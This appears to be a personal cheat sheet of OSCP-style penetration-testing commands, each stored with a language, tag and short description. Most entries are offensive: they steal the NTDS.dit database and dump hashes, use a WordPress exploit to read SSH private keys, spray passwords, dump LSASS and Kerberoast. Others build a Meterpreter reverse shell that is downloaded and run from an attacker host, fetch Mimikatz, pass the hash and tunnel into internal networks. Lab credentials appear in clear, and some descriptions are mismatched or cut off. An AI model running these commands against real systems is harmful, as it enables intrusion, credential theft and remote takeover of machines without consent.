oscp desc: Accessing the shared folder through the injected ticket - cmd: tasklist | findstr "calc" lang: ps1 tags: oscp desc: Veriyfing that calculator is running on FILES04 - cmd: PsExec64.exe \\DC1 cmd.exe lang: ps1 tags: oscp desc: Failed attempt to perform lateral movement - cmd: PsExec.exe \\dc1 cmd.exe lang: ps1 tags: oscp desc: Performing lateral movement and - cmd: psexec.exe \\192.168.50.70 cmd.exe lang: ps1 tags: oscp desc: Use of NTLM authentication blocks our - cmd: vshadow.exe -nw -p C:\ lang: ps1 tags: oscp desc: Permorming a Shadow Copy of the entire C:\ drive - cmd: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak lang: ps1 tags: oscp desc: Copying the ntds database to the C:\ drive - cmd: reg.exe save hklm\system c:\system.bak lang: ps1 tags: oscp desc: Copying the ntds database to the C:\ drive - cmd: impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL lang: sh tags: oscp desc: Copying the ntds database to the C:\ drive - cmd: mkdir beyond ; cd beyond ; mkdir mailsrv1 ; mkdir websrv1 ; touch creds.txt lang: sh tags: oscp desc: Basic work environment for this penetration test - cmd: gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config lang: sh tags: oscp desc: Using gobuster to identify pages and files on MAILSRV1 - cmd: whatweb http://192.168.50.244 lang: sh tags: oscp desc: WhatWeb scan of WEBSRV1 - cmd: wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan lang: sh tags: oscp desc: WPScan of the WordPress web page on WEBSRV1 - cmd: searchsploit duplicator lang: sh tags: oscp desc: SearchSploit results for the Duplicator WordPress plugin - cmd: searchsploit -x 50420 lang: sh tags: oscp desc: Searchsploit command to examine a specific exploit - cmd: cd beyond/websrv1 ; searchsploit -m 50420 lang: sh tags: oscp desc: SearchSploit command to copy the exploit script to the current directory - cmd: python3 50420.py http://192.168.50.244 /etc/passwd lang: sh tags: oscp desc: Performing a Directory Traversal attack on WEBSRV1 - cmd: python3 50420.py http://192.168.50.244 /home/marcus/.ssh/id_rsa ; python3 50420.py http://192.168.50.244 /home/daniela/.ssh/id_rsa lang: sh tags: oscp desc: Retrieving the SSH private key of daniela - cmd: ssh2john id_rsa > ssh.hash ; john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash lang: sh tags: oscp desc: Cracking the passphrase of the SSH private key - cmd: ssh -i id_rsa daniela@192.168.50.244 lang: sh tags: oscp desc: Accessing WEBSRV1 via SSH - cmd: sudo git -p help config lang: sh tags: oscp desc: Abusing git sudo command by launching pager in a privileged context - cmd: cd /srv/www/wordpress/ ; git status ; git log lang: sh tags: oscp desc: Examining the Git repository - cmd: git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1 lang: sh tags: oscp desc: Displaying the differences between the two commits - cmd: cat creds.txt lang: sh tags: oscp desc: Displaying contents of creds.txt - cmd: cat usernames.txt ; cat passwords.txt lang: sh tags: oscp desc: Displaying the created lists containing the identified usernames and passwords - cmd: crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success lang: sh tags: oscp desc: Checking for valid credentials with CrackMapExec - cmd: crackmapexec smb 192.168.56.30 -u users.txt -p users.txt --no-bruteforce lang: sh tags: oscp desc: Try the classic user=password test - cmd: sprayhound -lu bob -lp superman -U users.txt -d mini.lab -dc 192.168.56.30 --lower -t 2 lang: sh tags: oscp desc: try sprayhound with a valid user to avoid locking account (option -t to set the number of try left) - cmd: crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares lang: sh tags: oscp desc: Listing SMB shares on MAILSRV1 with CrackMapExec - cmd: crackmapexec smb 192.168.56.30 -u bob -p 'superman' -d mini.lab --users lang: sh tags: oscp desc: see the status of bruteforce - cmd: netexec smb 192.168.56.30 -u guest -p '' --rid-brute lang: sh tags: oscp desc: netexec to enumerate user account names on the host with a RID cycle attack - cmd: netexec smb 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt --continue-on-success lang: sh tags: oscp desc: netexec to password spray SMB - cmd: netexec rdp 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt lang: sh tags: oscp desc: netexec to password spray RDP - cmd: netexec winrm 192.168.56.31 -u bob -p /usr/share/seclists/Passwords/500-worst-passwords.txt lang: sh tags: oscp desc: netexec to password spray WINRM - cmd: lsassy -d mini.lab -u bob -p superman -m dumpertdll -O dumpertdll_path=~/hs/ressources/Outflank-Dumpert-DLL.dll 192.168.56.31 lang: sh tags: oscp desc: Dumping LSASS - cmd: impacket-GetADUsers -dc-ip 192.168.56.30 -all mini.lab/bob:superman lang: sh tags: oscp desc: List all users on AD using an account - cmd: ldapsearch -H ldap://192.168.56.30 -D "bob@mini.lab" -w superman -b 'DC=mini,DC=lab' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:' lang: sh tags: oscp desc: List all users on AD using an account and ldap - cmd: mkdir /home/kali/beyond/webdav ; /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/ lang: sh tags: oscp desc: Starting WsgiDAV on port 80 - cmd: swaks --server 10.10.87.13 --auth-user f.miller@skylark.com --auth-pass w35oyfm9C95cXEm21GYY -q AUTH lang: sh tags: oscp desc: Check a smtp account - cmd: whoami ; hostname ; ipconfig lang: sh tags: oscp desc: Obtaining basic information about the target machine - cmd: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.5 LPORT=443 -f exe -o met.exe lang: sh tags: oscp desc: Creating a Meterpreter reverse shell executable file - cmd: sudo msfconsole -q ; use multi/handler ; set payload windows/x64/meterpreter/reverse_tcp ; set LHOST 192.168.119.5 ; set LPORT 443 ; set ExitOnSession false ; run -j lang: sh tags: oscp desc: Starting Metasploit listener on port 443 - cmd: iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe lang: sh tags: oscp desc: Downloading and executing Meterpreter reverse shell - cmd: use multi/manage/autoroute ; set session 1 ; run ; use auxiliary/server/socks_proxy ; set SRVHOST 127.0.0.1 ; set VERSION 5 ; run -j lang: sh tags: oscp desc: Creating a SOCKS5 proxy to access the internal network from our Kali machine - cmd: cat /etc/proxychains4.conf lang: sh tags: oscp desc: proxychains configuration file settings - cmd: proxychains -q crackmapexec smb 172.16.6.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares lang: sh tags: oscp desc: Enumerating SMB with CrackMapExec and proxychains - cmd: ~/hs/tools/chisel server -p 8080 --reverse lang: sh tags: oscp desc: Setting up Chisel on Kali to access the Web Server on INTERNALSRV1 via Browser - cmd: sessions -i 1 ; upload chisel.exe C:\\Users\\marcus\\chisel.exe lang: sh tags: oscp desc: Uploading Chisel to CLIENTWK1 via our Meterpreter session - cmd: chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80 lang: sh tags: oscp desc: Utilizing Chisel to set up a reverse port forwarding to port 80 on INTERNALSRV1 - cmd: proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john lang: sh tags: oscp desc: Kerberoasting the daniela user account - cmd: sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force lang: sh tags: oscp desc: Cracking the TGSREP hash - cmd: cd C:\Users\Administrator ; iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe lang: sh tags: oscp desc: Downloading and executing the Meterpreter reverse shell - cmd: iwr -uri http://192.168.119.5:8000/mimikatz.exe -Outfile mimikatz.exe ; .\mimikatz.exe lang: ps1 tags: oscp desc: Downloading and launching the newest version of Mimikatz from our Kali machine - cmd: proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.6.240 lang: sh tags: oscp desc: Using psexec to get an interactive shell - cmd: ~/hs/tools/reverse-sshx64 -l -v lang: sh tags: oscp desc: Listen and bind reversessh - cmd: issh -i ~/hs/ressources/rssh/id_reverse-ssh localhost -p1234 lang: sh tags: oscp desc: connect back using reverse-ssh - cmd: iscp -i ~/hs/ressources/rssh/id_reverse-ssh -P40633 localhost:/C:/Users/Administrator/20231208013035_BloodHound.zip ./ lang: sh tags: oscp desc: using file transfert with reverse-ssh (windows target) - cmd: frpc tcp -r 6001 -i 127.0.0.1 -l 7001 -n tunnel-name lang: sh tags: COMMON desc: fast reverse tunnel 127.0.0.1:7001 to gb.hackade.org:6001 (need ghostunnel and chisel) - cmd: tail --pid=$(pgrep procname) -f /dev/null && ntf send finished lang: sh tags: COMMON desc: wait and send message when a process is fish - cmd: python3 -mvenv ~/.virtualenvs/wsgidav lang: sh tags: COMMON desc: create a new python virtualenvs - cmd: source ~/.virtualenvs/wsgidav/bin/activate lang: sh tags: COMMON desc: use a python venv - cmd: python3 -mvenv ~/.virtualenvs/reindent ; source ~/.virtualenvs/wsgidav/bin/reindent; reindent lang: sh tags: COMMON desc: install and use reindent for Python - cmd: cat ips | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | sponge ips lang: sh tags: COMMON desc: extract ips from file - cmd: paste -d ' ' old_ips ips | xargs -I{} bash -c "mv {}" lang: sh tags: COMMON desc: batch rename directory - cmd: ping -M do -s 192.168.1.1 lang: sh tags: COMMON desc: check for the correct MTU value - cmd: ip link set dev tun0 mtu 1250 lang: sh tags: COMMON desc: change the mtu value for an interface - cmd: sudo ip tuntap add user kali mode tun ligolo; sudo ip link set ligolo up lang: sh tags: oscp desc: Setup Ligolo-ng proxy - cmd: ~/hs/tools/ligolo-ng-proxy -selfcert lang: sh tags: oscp desc: Launch Ligolo-ng proxy using self-signed certs - cmd: ~/hs/tools/ligolo-ng-proxy -selfcert -laddr 0.0.0.0:7777 lang: sh tags: oscp desc: Launch Ligolo-ng proxy using self-signed certs and custom port - cmd: sudo ip route add 192.168.0.0/24 dev ligolo lang: sh tags: oscp desc: Add a route on the proxy/relay server to the 192.168.0.0/24 agent network - cmd: ligolo-ng-agent -ignore-cert -connect 192.168.45.157:11601 lang: sh tags: oscp desc: connect ligolo-ng agent - cmd: ligolo-ng » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp lang: sh tags: oscp desc: create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server. - cmd: ligolo-ng » session lang: sh tags: oscp desc: select a target - cmd: ligolo-ng » ifconfig lang: sh tags: oscp desc: Display the network configuration of the agent - cmd: ligolo-ng » start_tunnel lang: sh tags: oscp desc: Start the tunnel on the proxy - cmd: ligolo-ng » listener_list lang: sh tags: oscp desc: view currently running listeners - cmd: sudo ip route add 240.0.0.1/32 dev ligolo; nmap 240.0.0.1 -sV lang: sh tags: oscp desc: Access to agent's local ports (127.0.0.1) - cmd: ~/hs/tools/servedir.py ~/hs/ressources lang: sh tags: oscp desc: launch local webserver to serve ressources files - cmd: sudo ~/hs/tools/servedir.py ~/hs/ressources 80 lang: sh tags: oscp desc: launch local webserver to serve ressources files on port 80 - cmd: powershell Get-ChildItem -Path C:\users -Include *.txt -File -Recurse -ErrorAction SilentlyContinue lang: ps1 tags: oscp desc: search all txt files in users home - cmd: impacket-psexec 'Administrator:password@172.16.138.10' lang: sh tags: oscp desc: psexec using a local login/password - cmd: sudo lsof -nP -i tcp lang: sh tags: COMMON desc: list process listing tcp socket - cmd: sudo lsof -u 1000 lang: sh tags: COMMON desc: list files used by UID 1000 - cmd: sudo lsof -p 2658 lang: sh tags: COMMON desc: list files used by PID 2658